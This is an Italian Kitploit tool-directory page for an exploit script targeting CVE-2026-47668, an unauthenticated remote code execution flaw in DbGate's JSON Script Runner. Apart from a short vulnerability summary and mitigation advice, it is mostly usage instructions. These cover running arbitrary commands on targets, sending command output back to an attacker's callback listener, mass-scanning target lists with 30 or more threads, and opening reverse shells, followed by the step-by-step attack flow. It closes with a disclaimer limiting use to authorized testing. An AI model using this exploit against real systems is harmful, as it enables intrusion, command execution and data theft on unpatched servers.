Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-47668 — DbGate Unauthenticated Remote Code Execution | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-47668
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate Unauthenticated Remote Code Execution

Vedi Repository
62 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-47668 — DbGate Esecuzione di Codice Remota

RCE non autenticata in DbGate JSON Script Runner (dbgate-serve ≤ 7.1.8).
Strumento di valutazione: CVE-2026-47668.py — solo test autorizzati.

CVECVE-2026-47668
GravitàCritica
ProdottoDbGate / dbgate-serve
Versione interessata≤ 7.1.8
Versione corretta≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

Vulnerabilità

Titolo: DbGate Esecuzione di Codice Remota non Autenticata tramite JSON Script Runner

I campi controllati dall'utente (functionName, variableName) vengono inseriti in JavaScript generato dinamicamente senza una corretta validazione. Un attaccante può eseguire codice arbitrario nel processo figlio del runner Node.js.

Mitigazione: Aggiornare alla 7.1.9+. Limitare l'accesso di rete, disabilitare l'autenticazione anonima, ruotare le credenziali, verificare i log per attività sospette su /runners/start.


Contatti

Telegram: @KNxploited


Panoramica dello strumento

CVE-2026-47668.py verifica e convalida lo sfruttamento su istanze DbGate che sei autorizzato a testare.

Modalità

Risultati

Directory di output: Nx/ (vuln, dispatch, exfil, failed, list_report, file per-target in exfil/)


Installazione

root@kitploit:~
pip install -r requirements.txt

Richiede: Python 3.9+, aiohttp, colorama


Utilizzo

Procedura guidata AUTO (predefinita — nessuna reverse shell)

root@kitploit:~
python CVE-2026-47668.py
Input al promptEsempio
URL singolohttp://192.168.1.10:3000
URL + comandohttp://192.168.1.10:3000|id
Lista di targettargets.txt

CLI — abilita flag

Ogni esecuzione CLI deve includere --cli.

root@kitploit:~
python CVE-2026-47668.py --cli [options]

Target singolo

-u / --url — URL di base del target

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — comando shell (predefinito: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — solo probe di vulnerabilità (nessun comando)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — vettore di iniezione: functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — porta predefinita quando l'URL non ha porta (predefinita: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — utilizza token Bearer esistente

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — corpo di login personalizzato (predefinito: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — timeout HTTP in secondi

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — verifica certificati TLS

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

Callback / exfil (predefinito in CLI con --cmd)

--callback-host — IP/hostname che il target usa per raggiungere il tuo listener

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — bind locale per il listener HTTP (predefinito: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — porta HTTP exfil (predefinita: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — URL di callback esterno (disabilita il listener integrato)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — secondi di attesa per callback (target singolo, predefinito: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — invia output senza codifica base64

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — exec asincrono invece di execSync

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

Scansione di massa (nessuna reverse shell)

-f / --file — file con lista di target

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — worker concorrenti (predefinito: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — attesa callback per target nella scansione di massa (predefinito: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

Massa + porta predefinita personalizzata

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

Reverse shell (opzionale — solo target singolo)

Non richiesto per test normali. Utilizzare HTTP exfil (--cmd) per la prova.

--reverse-shell — il target si connette a LHOST:LPORT (ometti valore = IP LAN + porta 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — porta quando --reverse-shell non include :porta

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — indirizzo di ascolto locale

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — attesa per TCP (predefinito: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — relay base stdin/stdout dopo la connessione

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Nota Docker: utilizzare un IP raggiungibile dal container DbGate (ad esempio il gateway dell'host), non solo 127.0.0.1 sul tuo PC.


Lista di target (targets.txt)

root@kitploit:~
# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • Nessuna porta → 3000 applicata automaticamente
  • host|command → override del comando per riga
  • Report: Nx/list_report.txt

File di output


Flusso di lavoro

  1. POST /auth/login → token Bearer (automatico a meno di --token)
  2. Probe → il runner accetta l'iniezione
  3. POST /runners/start → esegue comando + callback HTTP (o TCP inverso se abilitato)
  4. Classifica → EXFIL = output confermato

Dichiarazione di non responsabilità

Solo per test di sicurezza autorizzati. Devi avere il permesso esplicito per testare qualsiasi sistema. L'autore non è responsabile per un uso improprio o illegale.


By: Nxploited

Scarica lo strumento
ElementoDettaglio
EndpointPOST /runners/start
AutenticazioneRichiede Bearer; il token può essere ottenuto tramite POST /auth/login su distribuzioni anonime/predefinite
IniezionefunctionName, variableName nei comandi JSON assign
ImpattoEsecuzione di comandi del sistema operativo come utente del processo DbGate
ModalitàReverse shellDescrizione
AUTONoUn prompt; token + callback HTTP + predefiniti
CLIOpzionaleControllo completo tramite flag
MassNoScansione da targets.txt
--reverse-shellSìVerifica TCP opzionale (solo singolo target)
RisultatoSignificato
FAILIrraggiungibile, autenticazione fallita o non vulnerabile
VULNRunner ha accettato solo il probe
DISPATCHPayload inviato; nessun output confermato
EXFILCallback ricevuto — output del comando confermato
REVSHTCP inverso connesso (solo modalità opzionale)
FileContenuto
Nx/vuln.txtTarget vulnerabili (probe OK)
Nx/dispatch.txtPayload inviato, non confermato
Nx/exfil.txtCallback confermati
Nx/failed.txtTarget falliti
Nx/exfil/<host>.txtOutput del comando per target
Nx/sessions/<id>/summary.jsonRiepilogo della sessione